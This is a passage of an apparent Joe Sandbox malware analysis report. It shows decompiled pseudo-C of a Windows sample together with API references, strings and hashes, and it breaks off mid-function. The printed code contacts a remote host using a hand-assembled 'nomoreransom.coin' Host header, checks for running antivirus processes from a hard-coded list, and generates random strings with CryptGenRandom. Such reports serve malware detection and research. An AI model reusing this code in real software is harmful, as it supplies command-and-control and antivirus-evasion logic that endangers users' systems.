			E0F1D7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F1D7CE0(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0f1d7ef8
0x0f1d7efb
0x0f1d7f00
0x0f1d7f03
0x0f1d7f03
0x0f1d7f0b
0x0f1d7f22
0x0f1d7f28
0x0f1d7f2a
0x0f1d7f31
0x0f1d7f36
0x0f1d7f4f
0x0f1d7f58
0x0f1d7f60
0x0f1d7f63
0x0f1d7f87
0x0f1d7f8b
0x0f1d7f98
0x0f1d7fa1
0x0f1d7fa8
0x0f1d7faf
0x0f1d7fb6
0x0f1d7fbd
0x0f1d7fc4
0x0f1d7fcb
0x0f1d7fd2
0x0f1d7fd9
0x0f1d7fe0
0x0f1d7fe7
0x0f1d7ff6
0x0f1d800d
0x0f1d805c
0x0f1d800f
0x0f1d8015
0x0f1d8018
0x0f1d801d
0x0f1d802c
0x0f1d8030
0x0f1d8030
0x0f1d8035
0x00000000
0x00000000
0x0f1d8037
0x0f1d8042
0x0f1d8049
0x0f1d8058
0x00000000
0x00000000
0x0f1d805a
0x00000000
0x0f1d8058
0x0f1d8030
0x0f1d802c
0x0f1d800d
0x0f1d7ff6
0x0f1d8062
0x0f1d8069
0x0f1d806e
0x0f1d807a
0x0f1d8089
0x0f1d7f3e
0x0f1d7f3e
0x0f1d7f3e

APIs

InternetCloseHandle.WININET(?), ref: 0F1D7F03
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F1D7F22
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F1D6EE6,ipv4bot.whatismyipaddress.com,0F1DFF10), ref: 0F1D7F4F
wsprintfW.USER32 ref: 0F1D7F63
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F1D7F81
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F1D7FEE
HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0F1D8005
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F1D8024
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F1D8050
GetLastError.KERNEL32 ref: 0F1D805C
InternetCloseHandle.WININET(00000000), ref: 0F1D8069
InternetCloseHandle.WININET(00000000), ref: 0F1D806E
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F1D6EE6), ref: 0F1D807A

Strings

., xrefs: 0F1D7FD9
:, xrefs: 0F1D7FA8
r, xrefs: 0F1D7FC4
H, xrefs: 0F1D7F98
HTTP/1.1, xrefs: 0F1D7F77
o, xrefs: 0F1D7FD2
n, xrefs: 0F1D7FAF
n, xrefs: 0F1D7FE7
r, xrefs: 0F1D7FBD
o, xrefs: 0F1D7FE0
n, xrefs: 0F1D7FCB
s, xrefs: 0F1D7FA1
m, xrefs: 0F1D7FB6

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
API String ID: 3906118045-3956618741
Opcode ID: 066f89dbb19df73eb82b668c6d954f34003e0e2dcc1d391487f9dedbd1a96b26
Instruction ID: 6e96a4a4df3dc30b16e92e93cd03c948fe48f2d7336cf3499825e212f4d092dd
Opcode Fuzzy Hash: 066f89dbb19df73eb82b668c6d954f34003e0e2dcc1d391487f9dedbd1a96b26
Instruction Fuzzy Hash: 18418431601218BFEB209F55DC49FAEBFBDFF04B65F104119FA04A6281C7B69964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1D4950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F1D4600(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F1D2D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F1D46F0(); // executed
					E0F1D40E0(_t90, _t106);
					E0F1D6420( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F1D63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F1D4930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F1D5880(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F1D6390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F1D4030();
							InitializeCriticalSection(0xf1e2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F1D3E20( &_v80);
							} else {
								E0F1D4000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf1e2a48);
							__eflags = E0F1D3AA0();
							if(__eflags != 0) {
								E0F1D43E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F1D3BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf1e2a44;
							if( *0xf1e2a44 != 0) {
								_t97 =  *0xf1e2a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F1D3BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0f1d495b
0x0f1d4961
0x0f1d4968
0x0f1d4981
0x0f1d4987
0x0f1d498e
0x0f1d49a4
0x0f1d49a8
0x0f1d49ac
0x0f1d49ac
0x0f1d49b2
0x0f1d49b6
0x0f1d49b6
0x0f1d49bc
0x0f1d49c1
0x0f1d49c9
0x0f1d49ce
0x0f1d49d5
0x0f1d49dc
0x0f1d49e3
0x0f1d49fd
0x0f1d4a02
0x0f1d4a09
0x0f1d4a1a
0x0f1d4a6b
0x0f1d4a83
0x0f1d4a88
0x0f1d4a8d
0x0f1d4a9c
0x0f1d4a8f
0x0f1d4a94
0x0f1d4a94
0x0f1d4aa3
0x0f1d4aa8
0x0f1d4aad
0x0f1d4ab4
0x0f1d4abb
0x0f1d4ac2
0x0f1d4ac9
0x0f1d4acd
0x0f1d4b1f
0x0f1d4b1f
0x0f1d4b29
0x0f1d4b2f
0x0f1d4b33
0x0f1d4b45
0x0f1d4b35
0x0f1d4b3b
0x0f1d4b3b
0x0f1d4b4f
0x0f1d4b5a
0x0f1d4b5c
0x0f1d4b5e
0x0f1d4b5e
0x0f1d4b77
0x0f1d4b7a
0x0f1d4b7e
0x0f1d4b8b
0x0f1d4b94
0x0f1d4ba4
0x0f1d4ba4
0x0f1d4baa
0x0f1d4bb1
0x0f1d4bb9
0x0f1d4bc7
0x0f1d4bc7
0x0f1d4bcf
0x0f1d4bcf
0x0f1d4ad9
0x0f1d4aef
0x0f1d4b06
0x0f1d4b0c
0x0f1d4b0e
0x0f1d4b18
0x00000000
0x0f1d4b18
0x0f1d4b12
0x0f1d4a1c
0x0f1d4a30
0x0f1d4a33
0x0f1d4a37
0x0f1d4a44
0x0f1d4a4d
0x0f1d4a5d
0x0f1d4a5d
0x0f1d4a65
0x0f1d4a65
0x0f1d4a1a
0x0f1d496c

APIs

Sleep.KERNEL32(000003E8), ref: 0F1D495B

Part of subcall function 0F1D4600: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D465C
Part of subcall function 0F1D4600: lstrcpyW.KERNEL32 ref: 0F1D467F
Part of subcall function 0F1D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4686
Part of subcall function 0F1D4600: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D469E
Part of subcall function 0F1D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46AA
Part of subcall function 0F1D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46B1
Part of subcall function 0F1D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D46CB

ExitProcess.KERNEL32 ref: 0F1D496C
CreateThread.KERNEL32 ref: 0F1D4981
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F1D4999
TerminateThread.KERNEL32(00000000,00000000), ref: 0F1D49AC
CloseHandle.KERNEL32(00000000), ref: 0F1D49B6
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F1D4A2A
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F1D4A44
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D4A5D
ExitProcess.KERNEL32 ref: 0F1D4A65

Strings

open, xrefs: 0F1D4BC0

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: fab95d92a5febc77b6a12f8903d0e674914ffa006d348d34a5ecce664dd4341b
Instruction ID: eb895758513630e48935e67a852d2a65903b90cc4bb8e1a70ca55796bf315820
Opcode Fuzzy Hash: fab95d92a5febc77b6a12f8903d0e674914ffa006d348d34a5ecce664dd4341b
Instruction Fuzzy Hash: FD713070A42308ABEB14DBE0DC5AFEE7B78AF48712F104114F2017A1C2DBB96994CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D7A10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F1D7A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0f1d7a2d
0x0f1d7a2f
0x0f1d7a3d
0x0f1d7a3f
0x0f1d7a46
0x0f1d7a4d
0x0f1d7a54
0x0f1d7a5b
0x0f1d7a62
0x0f1d7a69
0x0f1d7a70
0x0f1d7a77
0x0f1d7a7e
0x0f1d7a85
0x0f1d7a8c
0x0f1d7a93
0x0f1d7a9a
0x0f1d7aa1
0x0f1d7aa3
0x0f1d7aa5
0x0f1d7aaa
0x0f1d7ad4
0x0f1d7ada
0x0f1d7aac
0x0f1d7ab0
0x0f1d7ab6
0x0f1d7abc
0x0f1d7ac2
0x0f1d7adf
0x0f1d7ae1
0x0f1d7ae3
0x0f1d7ae6
0x0f1d7ae9
0x0f1d7aec
0x0f1d7aef
0x0f1d7af7
0x00000000
0x0f1d7b00
0x0f1d7b08
0x0f1d7b10
0x0f1d7b1f
0x0f1d7b23
0x00000000
0x0f1d7b25
0x0f1d7b25
0x0f1d7b25
0x0f1d7b87
0x0f1d7b87
0x0f1d7b8e
0x0f1d7b96
0x00000000
0x00000000
0x00000000
0x0f1d7b96
0x0f1d7b2e
0x0f1d7b2f
0x0f1d7b31
0x0f1d7b38
0x0f1d7b55
0x0f1d7b5e
0x0f1d7b3a
0x0f1d7b3a
0x0f1d7b47
0x0f1d7b47
0x0f1d7b60
0x0f1d7b7e
0x0f1d7b81
0x0f1d7b84
0x00000000
0x0f1d7b84
0x0f1d7ba7
0x0f1d7bab
0x0f1d7bad
0x0f1d7bb3
0x0f1d7bc0
0x0f1d7bc0
0x0f1d7bb3
0x0f1d7bcb
0x0f1d7bcb
0x0f1d7bdb
0x0f1d7be0
0x0f1d7be6
0x0f1d7beb
0x0f1d7bf5
0x0f1d7bf5
0x0f1d7bff
0x0f1d7ac4
0x0f1d7acc
0x00000000
0x0f1d7acc
0x0f1d7ac2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F1D7A2D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F1D7AA1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F1D7AB6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D7ACC
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F1D7AEF
lstrcmpiW.KERNEL32(0F1E033C,-00000024), ref: 0F1D7B15
Process32NextW.KERNEL32(?,?), ref: 0F1D7B8E
GetLastError.KERNEL32 ref: 0F1D7B98
lstrlenW.KERNEL32(00000000), ref: 0F1D7BB6
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D7BDB
FindCloseChangeNotification.KERNEL32(?), ref: 0F1D7BE0
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F1D7BF5

Strings

i)w, xrefs: 0F1D7B15

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 1411803383-1280834553
Opcode ID: d6da110ce5156a7bde607ab343c272b6e78116d21289158ba3e0d70b17188326
Instruction ID: 56c876ebb9cc3a9bb3da6b4d4b55e95d6958e2e02185e3db2c61c8782b0bbfd1
Opcode Fuzzy Hash: d6da110ce5156a7bde607ab343c272b6e78116d21289158ba3e0d70b17188326
Instruction Fuzzy Hash: 62519E71A02228EFCB10DFA4D948B9EBBB4FF48725F208059F504BB282C7B56965CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D8150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0F1D8150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0f1d8160
0x0f1d8162
0x0f1d8167
0x0f1d816a
0x0f1d816d
0x0f1d8175
0x0f1d8269
0x0f1d8271
0x0f1d817b
0x0f1d817b
0x0f1d8180
0x0f1d8180
0x0f1d8183
0x0f1d8188
0x0f1d8189
0x0f1d8195
0x0f1d8195
0x0f1d819b
0x0f1d81a1
0x0f1d81a5
0x0f1d8277
0x0f1d8285
0x0f1d8293
0x0f1d81b3
0x0f1d81b6
0x0f1d81be
0x0f1d81c5
0x0f1d81cc
0x0f1d81d2
0x0f1d81d6
0x0f1d81dd
0x0f1d81e4
0x0f1d81eb
0x0f1d81ef
0x0f1d81f7
0x0f1d8207
0x0f1d8207
0x0f1d820c
0x0f1d8214
0x00000000
0x0f1d8216
0x0f1d8216
0x0f1d8217
0x0f1d8218
0x0f1d821f
0x00000000
0x0f1d8221
0x0f1d8221
0x0f1d8225
0x0f1d8227
0x0f1d822a
0x0f1d8231
0x0f1d8235
0x0f1d823e
0x0f1d8242
0x0f1d8243
0x0f1d8231
0x0f1d8247
0x0f1d8247
0x0f1d821f
0x0f1d81f9
0x0f1d81f9
0x0f1d81fd
0x0f1d8205
0x0f1d824e
0x0f1d824e
0x00000000
0x00000000
0x00000000
0x0f1d8205
0x0f1d8255
0x0f1d8263
0x00000000
0x0f1d8263
0x0f1d81a5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1D816D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1D819B
GetModuleHandleA.KERNEL32(?), ref: 0F1D81EF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1D81FD
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1D820C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D8255
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D8263
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D8277
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D8285

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F1D8207, 0F1D820A
Advapi32.dll, xrefs: 0F1D81F9, 0F1D81FC

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: f2d4e7caf7cacfc003fc9b98d2010740becd116ade5a4aa10936b38129c884d1
Instruction ID: ee1ff2accc1828c7cab638db4523f794755d5a8ac8d392cd2a0f4a7adc83de67
Opcode Fuzzy Hash: f2d4e7caf7cacfc003fc9b98d2010740becd116ade5a4aa10936b38129c884d1
Instruction Fuzzy Hash: 2D31C575A01209ABDB10DFE5DC49BEEBB78EF04721F10406DF901A6141D775A621CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D82A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0F1D82A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
